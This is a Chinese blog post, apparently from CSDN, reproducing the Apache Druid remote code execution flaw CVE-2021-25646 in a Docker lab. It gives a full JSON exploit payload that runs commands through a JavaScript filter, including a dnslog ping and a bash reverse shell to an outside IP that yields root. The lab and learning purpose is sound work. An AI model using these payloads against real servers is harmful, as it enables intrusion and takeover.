CVE-2021-25646复现

已于 2023-04-28 12:05:06 修改
阅读量272 收藏 1
点赞数 2
分类专栏: 渗透 web工具 笔记 文章标签: web安全 安全 网络安全
于 2022-05-29 15:20:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53365018/article/details/125031190
版权
笔记 同时被 3 个专栏收录
10 篇文章 3 订阅
订阅专栏
渗透
3 篇文章 4 订阅
订阅专栏
web工具
2 篇文章 1 订阅
订阅专栏

在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。
影响版本
Apache Druid < 0.20.1
环境搭建
1、本次环境使用docker搭建,需要在虚拟机安装docker,安装完成后使用以下命令pull漏洞环境
docker pull fokkodriesprong/docker-druid
在这里插入图片描述

2、下载漏洞环境后使用以下命令启动漏洞环境
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

在这里插入图片描述

3、启动后在浏览器访问http://your-ip:8888/看到以下界面表示成功
在这里插入图片描述

漏洞复现
1、 在浏览器进入Apache Druid首页如何点击点击左上方Load data -> Local disk按钮
在这里插入图片描述

2、右侧表单填入Base directory:(quickstart/tutorial/)File filter:
(wikiticker-2015-09-12-sampled.json.gz)填入完成点击Preview,然后点击next
在这里插入图片描述

2、右侧表单填入Base directory:(quickstart/tutorial/)File filter:
(wikiticker-2015-09-12-sampled.json.gz)填入完成点击Preview,然

在这里插入图片描述

3.打开burp并配置代理,
在这里插入图片描述

4、然后替换数据包,将以下数据包,复制到里面
{“type”:“index”,“spec”:{“type”:“index”,“ioConfig”:{“type”:“index”,“firehose”:{“type”:“local”,“baseDir”:“quickstart/tutorial/”,“filter”:“wikiticker-2015-09-12-sampled.json.gz”}},“dataSchema”:{“dataSource”:“sample”,“parser”:{“type”:“string”,“parseSpec”:{“format”:“json”,“timestampSpec”:{“column”:“time”,“format”:“iso”},“dimensionsSpec”:{}}},“transformSpec”:{“transforms”:[],“filter”:{“type”:“javascript”,
“function”:“function(value){return java.lang.Runtime.getRuntime().exec(‘ping kujqmk.dnslog.cn -c 1’)}”,
“dimension”:“added”,
“”:{
“enabled”:“true”
}
}}}},“samplerConfig”:{“numRows”:500,“timeoutMs”:15000,“cacheKey”:“4ddb48fdbad7406084e37a1b80100214”}}

在这里插入图片描述
在这里插入图片描述

5、修改dnslog地址为反弹shell的payload,在kali中设置监听,可以看到成功反弹shell
在这里插入图片描述

exec(‘/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.83.42/8896 0>&1’)
替换前
在这里插入图片描述

替换后

“function”:“function(value){return java.lang.Runtime.getRuntime().exec(‘/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.83.42/8896 0>&1’)}”,
在这里插入图片描述

权限为root
在这里插入图片描述

漏洞修补
升级到最新版Apache Druid,下载地址为
https://druid.apache.org/downloads.html

Battle me
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CVE-2021-25646 Apache Druid JavaScript远程代码执行漏洞复现
afei001
03-31 393
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Docker搭建漏洞环境 5.2 构造Payload反弹shell 5.3 POC验证CVE-2021-25646 6.漏洞修复 1.漏洞概述 Druid 是一个高性能实时分析数据库。它是为大型数据集上实时探索查询的引擎,提供专为OLAP设计的开源分析数据存储系统,它的设计意图是在面对代码部署、机器故障以及其他产品系统遇到不测时能保持100%正常运行。它也可以用于后台用例,但设计决策...
复现nuclei——CVE-2021-25646(Apache Druid 命令执行漏洞)
记录并分享学习安全的知识点..
01-18 1260
一、漏洞介绍 Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 二、漏洞检测和判别方式 直接在网站的url中后加上: /druid/index.html 如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞! 三、nuclei扫描结果 四、漏洞复现 exp如下:
Apache Druid命令执行漏洞(CVE-2021-25646)复现
weixin_46137328的博客
02-04 1415
0x00 漏洞概述Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 包括执行用户提供的...
CVE-2021-25646:Apache Druid RCE远程代码执行复现
m0_58596609的博客
12-29 1511
CVE-2021-25646:Apache Druid RCE远程代码执行复现
CVE-2021-25646:Apache Druid RCE复现
黑白的博客
05-02 1432
声明 好好学习,天天向上 漏洞描述 Druid不仅是一个数据库连接池,还包含一个ProxyDriver、一系列内置的JDBC组件库、一个SQL Parser。 支持所有JDBC兼容的数据库,包括Oracle、MySql、Derby、Postgresql、SQL Server、H2等。 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的
Apache druid未授权命令执行漏洞复现(CVE-2021-25646)
deng_menglihua的博客
04-19 3512
Apache druid未授权命令执行漏洞复现(CVE-2021-25646) 1.简介 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 2.漏洞概述 编号:CVE-2021-25646(严重) Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 3.影响版本 Apache Druid < 0.20.1 4.环境搭建 ubuntu 1.安装doc
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
检测通过“ proxylogon”组漏洞(CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-26855
03-12
我已经在为中国读者翻译了中文漏洞利用程序,对于不熟悉golang的人,请看png图片
Apache Druid RCE(CVE-2021-25646复现
锋刃科技的博客
02-02 3636
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 这里使用docker来搭建 拉取镜像并启动Apache Druid:0.16.0版本的环境 docker pull fokkodrie...
CVE-2021-25646 Apache Druid 访问控制错误漏洞复现
m0_56642842的博客
06-24 496
0x01 漏洞概述 Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。 0x02 影响版本 Apache Druid 0.20.0及更早的版本 0x03 环境搭建 使用docker环境搭建,安装docker后,拉取镜像到本地。 docker pull fokko
Apache Druid 命令执行漏洞(CVE-2021-25646复现
thelostworld
02-02 7778
Apache Druid 命令执行漏洞(CVE-2021-25646) 一、漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 二、影响版本 Apache Druid < 0.20.1 三、漏洞环境&漏...
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 2089
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
Apache Druid远程命令执行漏洞复现(CVE-2021-25646)
MD@@nr丫卡uer
02-05 516
漏洞概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Druid < 0.20.1 漏洞复现 访问8888端口,进入Apache Druid首页: 点击左上方Load data,在点击Local disk,再点击右
Apache Druid 命令执行漏洞复现CVE-2021-25646
千寻的博客
02-04 1923
学习笔记下载 https://download.csdn.net/download/qq_41901122/15051281 文章目录学习笔记下载漏洞编号漏洞描述影响版本环境搭建第一步 安装jdk8环境第二步 搭建Druid第三步 访问8888端口漏洞复现查找漏洞点方法一:DNS解析方法二:反弹shell修复建议摘抄 漏洞编号 CVE-2021-25646 发布时间:2021-01-29 漏洞等级:高 漏洞描述 Apache Druid 是一个分布式的数据处理系统。 Apache Druid包括执行
Apache Druid远程代码执行漏洞复现CVE-2021-25646
Zlirving_的博客
02-04 2597
目录漏洞描述漏洞原理影响范围漏洞复现漏洞验证(dnslog)漏洞利用(反弹shell)修复建议 漏洞描述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点: 它支持根据时间戳对数据进行预聚合摄入和
Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC
good good study
02-26 6657
目录 漏洞简介 影响版本 docker-compose一键搭建漏洞环境 漏洞复现 1. 用DNSlog探测远程命令执行 2. 反弹shell 漏洞检测POC 漏洞简介 Apache Druid:Apache Druid是一个专为大数据集的快速切片分析(OLAP查询)而设计的实时分析数据库。Druid作为数据库,最常用于支持以下用例:实时摄取、快速查询和高运行时长。例如,Druid一般用于支持分析型应用程序的GUI,或是需要快速聚合的高并发API后台。Druid最适合用于面向事件的数据。
CVE-2021-28041复现
最新发布
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Battle me

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值